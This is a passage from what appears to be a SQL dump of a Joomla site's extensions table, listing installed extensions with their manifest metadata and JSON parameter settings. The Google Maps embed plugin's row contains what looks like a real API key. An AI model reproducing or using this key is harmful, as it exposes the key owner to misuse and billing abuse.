Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"5.2.1\",\"description\":\"Admin Tools CLI scripts v.5.2.1\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10036,0,'ImageRecycle Statistics','module','mod_imagerecycle_stats','',1,1,2,0,'{\"name\":\"ImageRecycle Statistics\",\"type\":\"module\",\"creationDate\":\"01-February-2016\",\"author\":\"ImageRecycle\",\"copyright\":\"\",\"authorEmail\":\"contact@imagerecycle.com\",\"authorUrl\":\"http:\\/\\/www.joomunited.com\",\"version\":\"2.0.16\",\"description\":\"Your ImageRecycle Statistics\",\"group\":\"\",\"filename\":\"mod_imagerecycle_stats\"}','','','',0,'0000-00-00 00:00:00',0,0),(10037,0,'News Show Pro GK5','module','mod_news_pro_gk5','',0,1,0,0,'{\"name\":\"News Show Pro GK5\",\"type\":\"module\",\"creationDate\":\"06\\/05\\/2017\",\"author\":\"Gavick.com\",\"copyright\":\"(C) 2009-2017 Gavick.com\",\"authorEmail\":\"info@gavick.com\",\"authorUrl\":\"www.gavick.com\",\"version\":\"1.9.3.8\",\"description\":\"\\n\\t\\n\\t\\t<style type=\'text\\/css\'>\\n\\t\\t\\tspan.readonly { padding: 10px; font-family: Arial; font-size:13px !important; font-weight: normal !important; text-align: justify; color: #4d4d4d; line-height: 24px; } \\n\\t\\t\\tspan.readonly h1 { clear:both; font-family: Georgia, sans-serif; font-size:38px; margin:30px 20px 23px; padding:0px 0px 24px 10px; color:#333; border-bottom: 1px solid #eee; font-weight: normal; } \\n\\t\\t\\tspan.readonly p { margin: 0 26px 10px } \\n\\t\\t\\tspan.readonly p a { color: #ef6b09 } \\n\\t\\t\\tspan.readonly p.homepage { margin-top: 30px } \\n\\t\\t\\tspan.readonly p.license { border-top: 1px solid #eee; font-size: 11px; margin: 30px 26px 0; padding: 6px 0; }\\n\\t\\t\\tspan.tooltip-content { display: none; }\\n\\t\\t\\t.tip-text span.readonly { display: none; }\\n\\t\\t\\t.tip-text span.tooltip-content { display: block; }\\n\\t\\t<\\/style>\\n\\t\\t<span class=\'readonly\'>\\n\\t\\t\\t<h1>News Show Pro GK5 <small>ver. 1.9.3.8<\\/small><\\/h1>\\n\\t\\t\\t<p>GK5 is new generation of our extensions dedicated to Joomla 3+.<\\/p>\\n\\t\\t\\t<p>Basing on experiences gathered, we created probably the best tool to present articles for Joomla! Huge amount of options and possibilities of formatting causes News Show Pro GK5 is a complex tool in making www pages content attractive. News Show Pro is appropriate while preparing simple structures with an individual article, the same as, complex arrangements including few articles and a list of links.<\\/p> \\n\\t\\t\\t<p class=\'homepage\'><a href=\'http:\\/\\/www.gavick.com\\/news-show-pro-gk5.html\' target=\'_blank\'>Learn more at the NSP GK5 project website.<\\/a><\\/p>\\n\\t\\t\\t<p class=\'license\'>News Show Pro GK5 is released under the <a target=\\\"_blank\\\" href=\\\"http:\\/\\/www.gnu.org\\/licenses\\/gpl-2.0.html\\\">GNU\\/GPL v2 license.<\\/a><\\/p>\\n\\t\\t<\\/span>\\n\\t\\t<span class=\'tooltip-content\'>Advanced content module for Joomla! 3<\\/span>\\n\\t\\n\\t\",\"group\":\"\",\"filename\":\"mod_news_pro_gk5\"}','{\"moduleclass_sfx\":\"\",\"module_unique_id\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_mode\":\"normal\",\"use_own_article_format\":\"0\",\"article_format\":\"\",\"article_format_text\":\"\",\"nsp_pre_text\":\"\",\"nsp_post_text\":\"\",\"data_source\":\"\",\"source_name\":\"com_content\",\"com_content_categories\":\"\",\"com_content_articles\":\"\",\"k2_categories\":\"\",\"k2_tags\":\"\",\"k2_authors\":\"\",\"k2_articles\":\"\",\"easyblog_categories\":\"\",\"easyblog_tags\":\"\",\"easyblog_authors\":\"\",\"easyblog_articles\":\"\",\"rss_feed\":\"\",\"json_file\":\"\",\"xml_file\":\"\",\"com_virtuemart_products\":\"\",\"com_virtuemart_categories\":\"\",\"com_hikashop_products\":\"\",\"com_hikashop_categories\":\"\",\"jomsocial_user_status\":\"\",\"jomsocial_user_photo\":\"\",\"com_solidres_hotel_categories\":\"\",\"com_solidres_hotels\":\"\",\"com_solidres_rooms\":\"\",\"news_sort_value\":\"created\",\"news_sort_order\":\"DESC\",\"offset\":\"0\",\"news_since\":\"\",\"news_in\":\"\",\"news_featured\":\"1\",\"only_featured\":\"0\",\"one_article_per_category\":\"0\",\"news_unauthorized\":\"0\",\"time_offset\":\"0\",\"thumb_image_type\":\"first\",\"com_content_comments_source\":\"none\",\"com_content_text_type\":\"introtext\",\"hide_current_com_content_article\":\"0\",\"k2_comments_source\":\"k2\",\"com_k2_text_type\":\"introtext\",\"hide_current_k2_article\":\"0\",\"k2_image_size\":\"Generic\",\"k2_get_extra_fields\":\"0\",\"hikashop_itemid\":\"9999\",\"hikashop_out_of_stock\":\"1\",\"hikashop_add_to_cart\":\"1\",\"rss_cache_time\":\"60\",\"easyblog_comments_source\":\"easyblog\",\"hide_current_easyblog_article\":\"0\",\"easyblog_image_size\":\"Generic\",\"vm_itemid\":\"9999\",\"vm_lang\":\"\",\"vm_shopper_group\":\"-1\",\"vm_out_of_stock\":\"1\",\"vm_show_price_type\":\"salesPrice\",\"vm_add_to_cart\":\"0\",\"vm_show_discount_amount\":\"0\",\"vm_show_tax\":\"0\",\"vm_display_type\":\"text_price\",\"vm_show_featured_badge\":\"0\",\"portal_mode_news_gallery_amount\":\"10\",\"portal_mode_news_gallery_cols\":\"3\",\"portal_mode_news_gallery_pagination_type\":\"arrows\",\"portal_mode_news_gallery_autoanimation\":\"1\",\"portal_mode_news_gallery_autoanimation_time\":\"5000\",\"portal_mode_product_gallery_amount\":\"10\",\"portal_mode_product_gallery_cols\":\"3\",\"portal_mode_product_gallery_nav\":\"1\",\"portal_mode_product_gallery_autoanimation\":\"1\",\"portal_mode_product_gallery_autoanimation_time\":\"5000\",\"portal_mode_product_gallery_2_rows\":\"2\",\"portal_mode_product_gallery_2_cols\":\"4\",\"portal_mode_product_gallery_2_button\":\"cart\",\"portal_mode_news_blocks_cols\":\"2\",\"portal_mode_news_blocks_rows\":\"2\",\"portal_mode_title_overlay_text_pos\":\"top\",\"portal_mode_title_overlay_text_padding\":\"30px\",\"portal_mode_title_overlay_text_bg\":\"transparent\",\"portal_mode_title_overlay_text_width\":\"100\",\"portal_mode_centered_title_overlay_text_bg\":\"\",\"portal_mode_centered_title_limit_type\":\"chars\",\"portal_mode_centered_title_limit\":\"40\",\"portal_mode_centered_text_limit_type\":\"words\",\"portal_mode_centered_text_limit\":\"30\",\"portal_mode_portfolio_initial_anim\":\"0\",\"portal_mode_portfolio_cols\":\"3\",\"portal_mode_portfolio_rows\":\"3\",\"portal_mode_portfolio_pages\":\"3\",\"portal_mode_portfolio_link\":\"1\",\"portal_mode_portfolio_link_url\":\"\",\"portal_mode_portfolio2_cols\":\"3\",\"portal_mode_portfolio2_rows\":\"3\",\"portal_mode_portfolio2_filter\":\"1\",\"portal_mode_portfolio2_popup\":\"1\",\"portal_mode_speakers_list_cols\":\"2\",\"portal_mode_speakers_list_rows\":\"2\",\"portal_mode_grid_title_overlay_text_pos\":\"none\",\"portal_mode_grid_title_overlay_text_color\":\"light\",\"portal_mode_grid_title_overlay_text_padding\":\"30px\",\"portal_mode_frontpage_image_overlay_text_color\":\"light\",\"portal_mode_frontpage_image_overlay_title\":\"1\",\"portal_mode_frontpage_image_overlay_text\":\"1\",\"portal_mode_frontpage_image_overlay_text_limit\":\"100\",\"portal_mode_frontpage_image_overlay_readon\":\"1\",\"portal_mode_frontpage_image_overlay_readon_text\":\"\",\"portal_mode_highlights_readmore\":\"\",\"portal_mode_highlights_amount\":\"7\",\"portal_mode_highlights_date_format\":\"\",\"portal_mode_highlights_title_limit_type\":\"chars\",\"portal_mode_highlights_title_limit\":\"40\",\"portal_mode_video_gallery_popup\":\"1\",\"portal_mode_video_gallery_popup_x\":\"640\",\"portal_mode_video_gallery_popup_y\":\"480\",\"portal_mode_video_gallery_pages\":\"2\",\"portal_mode_video_gallery_per_page\":\"3\",\"portal_mode_video_gallery_title_limit_type\":\"chars\",\"portal_mode_video_gallery_title_limit\":\"40\",\"portal_mode_video_gallery_text_limit_type\":\"chars\",\"portal_mode_video_gallery_text_limit\":\"60\",\"portal_mode_video_gallery_autoanimation\":\"5000\",\"portal_mode_video_list_popup\":\"1\",\"portal_mode_video_list_popup_x\":\"640\",\"portal_mode_video_list_popup_y\":\"480\",\"portal_mode_video_list_pages\":\"2\",\"portal_mode_video_list_per_page\":\"3\",\"portal_mode_video_list_rows\":\"1\",\"portal_mode_video_list_title\":\"1\",\"portal_mode_video_list_date\":\"1\",\"portal_mode_video_list_title_limit_type\":\"chars\",\"portal_mode_video_list_title_limit\":\"40\",\"portal_mode_events_list_cols\":\"2\",\"portal_mode_events_list_rows\":\"2\",\"portal_mode_jomsocial_photos_total\":\"8\",\"portal_mode_jomsocial_photos_amount\":\"4\",\"portal_mode_jomsocial_photos_width\":\"310\",\"portal_mode_jomsocial_photos_animation\":\"0\",\"portal_mode_grid_news_cols\":\"2\",\"portal_mode_grid_news_rows\":\"2\",\"portal_mode_grid_news_title_length\":\"40\",\"portal_mode_grid_news_title_length_type\":\"chars\",\"portal_mode_grid_news_date_format\":\"f J, Y\",\"portal_mode_grid_news_text_length\":\"40\",\"portal_mode_grid_news_text_length_type\":\"chars\",\"portal_mode_grid_news_url\":\"\",\"portal_mode_grid_news_link_text\":\"Find more news\",\"portal_mode_portfolio_grid_amount\":\"20\",\"portal_mode_portfolio_grid_cols\":\"5\",\"portal_mode_portfolio_grid_cols_small_desktop\":\"4\",\"portal_mode_portfolio_grid_cols_tablet\":\"3\",\"portal_mode_portfolio_grid_cols_small_tablet\":\"2\",\"portal_mode_portfolio_grid_cols_mobile\":\"1\",\"portal_mode_portfolio_grid_title_length\":\"40\",\"portal_mode_portfolio_grid_title_length_type\":\"chars\",\"portal_mode_portfolio_grid_title_link\":\"1\",\"portal_mode_portfolio_grid_overlay\":\"1\",\"portal_mode_portfolio_grid_popup\":\"1\",\"portal_mode_portfolio_grid_date_format\":\"f J, Y\",\"portal_mode_portfolio_grid_author\":\"1\",\"portal_mode_news_slider_amount\":\"5\",\"portal_mode_news_slider_title\":\"1\",\"portal_mode_news_slider_text\":\"1\",\"portal_mode_news_slider_date\":\"1\",\"portal_mode_news_slider_date_format\":\"j F\",\"portal_mode_news_slider_autoanimation_time\":\"3000\",\"portal_mode_news_slider_image_margin\":\"-30% 0\",\"portal_mode_news_slider_label\":\"\",\"portal_mode_news_slider_category_label\":\"\",\"portal_mode_bikestore_slider_amount\":\"8\",\"portal_mode_bikestore_slider_speed\":\"3500\",\"portal_mode_bikestore_slider_autoanim\":\"0\",\"portal_mode_technews_header1_cols\":\"3\",\"portal_mode_technews_header2_layout\":\"main_cols\",\"portal_mode_new_news_header_layout\":\"main_2rows_2rows\",\"portal_mode_new_news_slider_amount\":\"6\",\"portal_mode_new_news_slider_interval\":\"0\",\"portal_mode_new_news_slider_item_width\":\"300\",\"portal_mode_new_news_slider_item_width_small_desktop\":\"250\",\"portal_mode_new_news_slider_item_width_tablet\":\"200\",\"portal_mode_new_news_slider_item_width_mobile\":\"150\",\"portal_mode_new_news_slider_arrows\":\"1\",\"portal_mode_new_news_slider_images\":\"1\",\"portal_mode_technews_rating_rows\":\"4\",\"portal_mode_technews_reviews_items\":\"6\",\"portal_mode_technews_reviews_intro\":\"\",\"portal_mode_technews_reviews_btn\":\"Find more\",\"portal_mode_technews_reviews_btn_url\":\"\",\"portal_mode_technews_reviews_autoanim\":\"1\",\"portal_mode_technews_reviews_interval\":\"3000\",\"news_full_pages\":\"3\",\"news_column\":\"1\",\"news_rows\":\"1\",\"top_interface_style\":\"arrows_with_pagination\",\"open_links_window\":\"_self\",\"articles_link\":\"0\",\"articles_link_url\":\"\",\"articles_link_label\":\"\",\"news_content_header_pos\":\"left\",\"news_content_header_float\":\"none\",\"news_header_link\":\"1\",\"news_header_first_word\":\"0\",\"use_title_alias\":\"0\",\"title_limit_type\":\"chars\",\"title_limit\":\"40\",\"news_content_image_pos\":\"left\",\"news_content_image_float\":\"left\",\"news_image_link\":\"1\",\"news_image_modal\":\"0\",\"news_content_text_pos\":\"left\",\"news_content_text_float\":\"left\",\"news_text_link\":\"0\",\"news_limit_type\":\"words\",\"news_limit\":\"30\",\"clean_xhtml\":\"1\",\"allowed_tags\":\"\",\"more_text_value\":\"...\",\"readmore_text\":\"\",\"parse_plugins\":\"0\",\"clean_plugins\":\"0\",\"news_content_info_pos\":\"left\",\"news_content_info_float\":\"none\",\"news_content_info2_pos\":\"left\",\"news_content_info2_float\":\"left\",\"info_format\":\"%DATE %HITS %CATEGORY %AUTHOR\",\"info2_format\":\"\",\"category_link\":\"1\",\"date_format\":\"d-m-Y\",\"date_publish\":\"0\",\"username\":\"0\",\"user_avatar\":\"1\",\"avatar_size\":\"16\",\"art_padding\":\"0 20px 20px 0\",\"news_header_order\":\"1\",\"news_header_enabled\":\"1\",\"news_image_order\":\"3\",\"news_image_enabled\":\"1\",\"news_text_order\":\"4\",\"news_text_enabled\":\"1\",\"news_info_order\":\"2\",\"news_info_enabled\":\"1\",\"news_info2_order\":\"5\",\"news_info2_enabled\":\"1\",\"news_content_readmore_pos\":\"right\",\"news_readmore_enabled\":\"1\",\"news_short_pages\":\"3\",\"links_amount\":\"3\",\"links_columns_amount\":\"1\",\"links_image\":\"0\",\"links_image_position\":\"left\",\"links_image_link\":\"1\",\"links_readmore\":\"0\",\"bottom_interface_style\":\"arrows_with_pagination\",\"links_margin\":\"0\",\"links_position\":\"bottom\",\"links_width\":\"50\",\"list_title_limit_type\":\"words\",\"list_title_limit\":\"20\",\"list_text_limit_type\":\"words\",\"list_text_limit\":\"30\",\"links_title\":\"0\",\"links_title_url\":\"\",\"links_title_label\":\"\",\"responsive_images\":\"0\",\"wrap_content\":\"0\",\"memory_limit\":\"128M\",\"use_curl_download\":\"0\",\"create_thumbs\":\"0\",\"img_auto_scale\":\"1\",\"img_keep_aspect_ratio\":\"0\",\"img_width\":\"160\",\"img_height\":\"120\",\"img_margin\":\"6px 14px 0 0\",\"links_img_width\":\"160\",\"links_img_height\":\"120\",\"links_img_margin\":\"6px 14px 0 0\",\"img_bg\":\"#000\",\"img_stretch\":\"0\",\"img_quality\":\"95\",\"thumbs_cache_time\":\"30\",\"simple_crop_editor\":\"\",\"simple_crop_top\":\"0\",\"simple_crop_bottom\":\"0\",\"simple_crop_left\":\"0\",\"simple_crop_right\":\"0\",\"crop_rules\":\"\",\"grayscale_filter\":\"0\",\"sepia_filter\":\"0\",\"blur_filter\":\"0\",\"brightness_filter\":\"0\",\"smooth_filter\":\"0\",\"pixelate_filter\":\"0\",\"contrast_filter\":\"0\",\"filter_arg\":\"0\",\"autoanim\":\"0\",\"hover_anim\":\"0\",\"animation_speed\":\"400\",\"animation_interval\":\"5000\",\"animation_function\":\"Fx.Transitions.Expo.easeIn\",\"useCSS\":\"1\",\"useScript\":\"2\",\"engine_mode\":\"jquery\",\"include_jquery\":\"0\",\"url_overrides\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10038,10040,'com_djimageslider','component','com_djimageslider','',1,1,0,0,'{\"name\":\"com_djimageslider\",\"type\":\"component\",\"creationDate\":\"2018-12-19\",\"author\":\"DJ-Extensions.com\",\"copyright\":\"Copyright (C) 2017 DJ-Extensions.com, All rights reserved.\",\"authorEmail\":\"contact@dj-extensions.com\",\"authorUrl\":\"http:\\/\\/dj-extensions.com\",\"version\":\"4.0.1\",\"description\":\"DJ-ImageSlider component\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10039,10040,'DJ-ImageSlider','module','mod_djimageslider','',0,1,0,0,'{\"name\":\"DJ-ImageSlider\",\"type\":\"module\",\"creationDate\":\"2018-12-19\",\"author\":\"DJ-Extensions.com\",\"copyright\":\"Copyright (C) 2017 DJ-Extensions.com, All rights reserved.\",\"authorEmail\":\"contact@dj-extensions.com\",\"authorUrl\":\"http:\\/\\/dj-extensions.com\",\"version\":\"4.0.0\",\"description\":\"DJ-ImageSlider Module\",\"group\":\"\",\"filename\":\"mod_djimageslider\"}','{\"slider_source\":\"0\",\"slider_type\":\"0\",\"theme\":\"default\",\"link_image\":\"1\",\"image_folder\":\"images\\/sampledata\\/fruitshop\",\"link\":\"\",\"show_title\":\"1\",\"show_desc\":\"1\",\"show_readmore\":\"0\",\"readmore_text\":\"\",\"link_title\":\"1\",\"link_desc\":\"0\",\"limit_desc\":\"\",\"full_width\":\"0\",\"image_width\":\"240\",\"image_height\":\"180\",\"fit_to\":\"0\",\"image_centering\":\"0\",\"visible_images\":\"3\",\"space_between_images\":\"10\",\"max_images\":\"20\",\"sort_by\":\"1\",\"css3\":\"1\",\"autoplay\":\"1\",\"show_buttons\":\"1\",\"show_arrows\":\"1\",\"show_custom_nav\":\"0\",\"desc_width\":\"\",\"desc_bottom\":\"0\",\"desc_horizontal\":\"0\",\"left_arrow\":\"\",\"right_arrow\":\"\",\"play_button\":\"\",\"pause_button\":\"\",\"arrows_top\":\"40\",\"arrows_horizontal\":\"10\",\"idx_style\":\"0\",\"effect\":\"Expo\",\"effect_type\":\"0\",\"duration\":\"\",\"delay\":\"\",\"preload\":\"800\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10044,0,'plg_system_regularlabs','plugin','regularlabs','system',0,1,1,0,'{\"name\":\"plg_system_regularlabs\",\"type\":\"plugin\",\"creationDate\":\"February 2018\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2018 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/www.regularlabs.com\",\"version\":\"18.2.13418\",\"description\":\"PLG_SYSTEM_REGULARLABS_DESC\",\"group\":\"\",\"filename\":\"regularlabs\"}','{\"combine_admin_menu\":\"0\",\"show_help_menu\":\"1\",\"max_list_count\":\"2500\"}','','',0,'0000-00-00 00:00:00',0,0),(10045,0,'com_snippets','component','com_snippets','',1,1,0,0,'{\"name\":\"com_snippets\",\"type\":\"component\",\"creationDate\":\"February 2018\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2018 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/www.regularlabs.com\",\"version\":\"6.4.0\",\"description\":\"COM_SNIPPETS_DESC\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10046,0,'plg_editors-xtd_snippets','plugin','snippets','editors-xtd',0,0,1,0,'{\"name\":\"plg_editors-xtd_snippets\",\"type\":\"plugin\",\"creationDate\":\"February 2018\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2018 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/www.regularlabs.com\",\"version\":\"6.4.0\",\"description\":\"PLG_EDITORS-XTD_SNIPPETS_DESC\",\"group\":\"\",\"filename\":\"snippets\"}','{\"@notice\":\"RL_ONLY_AVAILABLE_IN_PRO\"}','','',0,'0000-00-00 00:00:00',0,0),(10047,0,'plg_system_snippets','plugin','snippets','system',0,1,1,0,'{\"name\":\"plg_system_snippets\",\"type\":\"plugin\",\"creationDate\":\"February 2018\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2018 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/www.regularlabs.com\",\"version\":\"6.4.0\",\"description\":\"PLG_SYSTEM_SNIPPETS_DESC\",\"group\":\"\",\"filename\":\"snippets\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10048,0,'COM_BREEZINGFORMS','component','com_breezingforms','',1,1,0,0,'{\"name\":\"COM_BREEZINGFORMS\",\"type\":\"component\",\"creationDate\":\"2020-07-30\",\"author\":\"Markus Bopp | Until FacileForms Version 1.4.7: Peter Koch\",\"copyright\":\"This Joomla! component is released under the GNU\\/GPL license\",\"authorEmail\":\"markus.bopp@crosstec.org\",\"authorUrl\":\"www.crosstec.org\",\"version\":\"1.9.1 Stable (941)\",\"description\":\"Installation successful. Next find BreezingForms in the Components menu, and finish the installation process.\",\"group\":\"\",\"filename\":\"breezingforms\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10049,0,'BreezingForms','module','mod_breezingforms','',0,1,0,0,'{\"name\":\"BreezingForms\",\"type\":\"module\",\"creationDate\":\"November 2013\",\"author\":\"Markus Bopp - Crosstec Solutions | Until Version 1.4.7: Peter Koch\",\"copyright\":\"This Joomla! component is released under the GNU\\/GPL license\",\"authorEmail\":\"markus.bopp@crosstec.de\",\"authorUrl\":\"www.crosstec.de\",\"version\":\"1.8.4\",\"description\":\"\\n\\t\\tEnter the form name for displaying in the desired module position.\\n \",\"group\":\"\",\"filename\":\"mod_breezingforms\"}','{\"ff_mod_name\":\"\",\"ff_mod_page\":\"1\",\"ff_mod_editable\":\"0\",\"ff_mod_editable_override\":\"0\",\"ff_mod_frame\":\"0\",\"ff_mod_border\":\"0\",\"ff_mod_align\":\"1\",\"ff_mod_left\":\"0\",\"ff_mod_top\":\"0\",\"ff_mod_parprv\":\"\",\"ff_mod_parpub\":\"\",\"moduleclass_sfx\":\"\",\"owncache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10050,0,'PLG_EMBED_GOOGLE_MAP','plugin','embed_google_map','content',0,1,1,0,'{\"name\":\"PLG_EMBED_GOOGLE_MAP\",\"type\":\"plugin\",\"creationDate\":\"25 June 2016\",\"author\":\"Petteri Kivim\\u00e4ki\",\"copyright\":\"(C)2012-2016 Petteri Kivim\\u00e4ki\",\"authorEmail\":\"dinky_jackson@hotmail.com\",\"authorUrl\":\"\",\"version\":\"2.1.0\",\"description\":\"PLG_EMBED_GOOGLE_MAP_DESC\",\"group\":\"\",\"filename\":\"embed_google_map\"}','{\"version\":\"new\",\"map_type\":\"m\",\"zoom\":\"10\",\"language\":\"-\",\"add_link\":\"1\",\"link_label\":\"View Larger Map\",\"link_full\":\"1\",\"show_info\":\"0\",\"height\":\"400\",\"width\":\"300\",\"border\":\"0\",\"border_style\":\"solid\",\"border_color\":\"#000000\",\"https\":\"1\",\"embed_api_key\":\" AIzaSyDeFYz4dRXbj9YOH5lrML_kfrcWfK9plNo \",\"load_async\":\"0\",\"delay_ms\":\"2000\",\"scrolling\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10052,0,'System - SP PageBuilder','plugin','sppagebuilder','system',0,1,1,0,'{\"name\":\"System - SP PageBuilder\",\"type\":\"plugin\",\"creationDate\":\"Sep 2016\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2016 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.3\",\"description\":\"SP Page Builder System plugin to add support for 3rd party components\",\"group\":\"\",\"filename\":\"sppagebuilder\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10053,0,'SP Page Builder','module','mod_sppagebuilder','',0,1,0,0,'{\"name\":\"SP Page Builder\",\"type\":\"module\",\"creationDate\":\"Oct 2016\",\"author\":\"JoomShaper\",\"copyright\":\"Copyright (C) 2010 - 2019 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.3\",\"description\":\"Module to display content from SP Page Builder\",\"group\":\"\",\"filename\":\"mod_sppagebuilder\"}','{\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}','','',0,'0000-00-00 00:00:00',0,0),(10060,0,'sysbreezingforms','plugin','sysbreezingforms','system',0,1,1,0,'{\"name\":\"sysbreezingforms\",\"type\":\"plugin\",\"creationDate\":\"March 2017\",\"author\":\"Markus Bopp\",\"copyright\":\"Copyright (C) 2015 - Markus Bopp\",\"authorEmail\":\"markus.bopp@crosstec.org\",\"authorUrl\":\"crosstec.org\",\"version\":\"1.0.0\",\"description\":\"System plugin required by the BreezingForms component\",\"group\":\"\",\"filename\":\"sysbreezingforms\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10080,0,'file_fef','file','file_fef','',0,1,0,0,'{\"name\":\"file_fef\",\"type\":\"file\",\"creationDate\":\"2019-01-07\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"(C) 2017-2018 Akeeba Ltd.\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"1.0.7\",\"description\":\"Akeeba Frontend Framework - The CSS framework for Akeeba Ltd extensions.\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10084,0,'Regular Labs Library','library','regularlabs','',0,1,1,0,'{\"name\":\"Regular Labs Library\",\"type\":\"library\",\"creationDate\":\"February 2018\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2018 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/www.regularlabs.com\",\"version\":\"18.2.13418\",\"description\":\"\",\"group\":\"\",\"filename\":\"regularlabs\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10089,0,'plg_finder_sppagebuilder','plugin','sppagebuilder','finder',0,0,1,0,'{\"name\":\"plg_finder_sppagebuilder\",\"type\":\"plugin\",\"creationDate\":\"March 2018\",\"author\":\"JoomShaper\",\"copyright\":\"(C) 2010 - 2019 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.6.1\",\"description\":\"PLG_FINDER_SP_PAGEBUILDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sppagebuilder\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10090,0,'Tsi Map','module','mod_tsimap','',0,1,0,0,'{\"name\":\"Tsi Map\",\"type\":\"module\",\"creationDate\":\"Unknown\",\"author\":\"Design Studio WWW\",\"copyright\":\"Copyright (C) 2011-2016 Design Studio WWW All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"1.0.0\",\"description\":\"The module display awesome maps form Google with Squezze styles.\",\"group\":\"\",\"filename\":\"mod_tsimap\"}','{\"Marker\":\"\",\"Zoom\":\"14\",\"Latitude\":\"\",\"Longitude\":\"\",\"Height\":\"400px\",\"Width\":\"100%\",\"Style\":\"[{\\\"featureType\\\":\\\"landscape\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"lightness\\\":65},{\\\"visibility\\\":\\\"on\\\"}]},{\\\"featureType\\\":\\\"poi\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"lightness\\\":51},{\\\"visibility\\\":\\\"simplified\\\"}]},{\\\"featureType\\\":\\\"road.highway\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"visibility\\\":\\\"simplified\\\"}]},{\\\"featureType\\\":\\\"road.arterial\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"lightness\\\":30},{\\\"visibility\\\":\\\"on\\\"}]},{\\\"featureType\\\":\\\"road.local\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"lightness\\\":40},{\\\"visibility\\\":\\\"on\\\"}]},{\\\"featureType\\\":\\\"transit\\\",\\\"stylers\\\":[{\\\"saturation\\\":-100},{\\\"visibility\\\":\\\"simplified\\\"}]},{\\\"featureType\\\":\\\"administrative.province\\\",\\\"stylers\\\":[{\\\"visibility\\\":\\\"off\\\"}]},{\\\"featureType\\\":\\\"water\\\",\\\"elementType\\\":\\\"labels\\\",\\\"stylers\\\":[{\\\"visibility\\\":\\\"on\\\"},{\\\"lightness\\\":-25},{\\\"saturation\\\":-100}]},{\\\"featureType\\\":\\\"water\\\",\\\"elementType\\\":\\\"geometry\\\",\\\"stylers\\\":[{\\\"hue\\\":\\\"#ffff00\\\"},{\\\"lightness\\\":-25},{\\\"saturation\\\":-97}]}]\",\"UseAPI\":\"0\",\"ApiKey\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10092,0,'file_fof30','file','file_fof30','',0,1,0,0,'{\"name\":\"file_fof30\",\"type\":\"file\",\"creationDate\":\"2021-02-19\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(c)2010-2021 Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"authorEmail\":\"nicholas@akeeba.com\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"3.7.4\",\"description\":\"\\n\\t\\t\\n\\t\\tFramework-on-Framework (FOF) 3.x - The rapid application development framework for Joomla!.<br\\/>\\n\\t\\t<b>WARNING<\\/b>: This is NOT a duplicate of the FOF library already installed with Joomla!. It is a different version used by other extensions on your site. Do NOT uninstall either FOF package. If you do you will break your site.\\n\\t\\t\\n\\t\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10093,10033,'PLG_SYSTEM_ADMINTOOLSACTIONLOG','plugin','admintoolsactionlog','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_ADMINTOOLSACTIONLOG\",\"type\":\"plugin\",\"creationDate\":\"2018-11-30\",\"author\":\"Nicholas K. 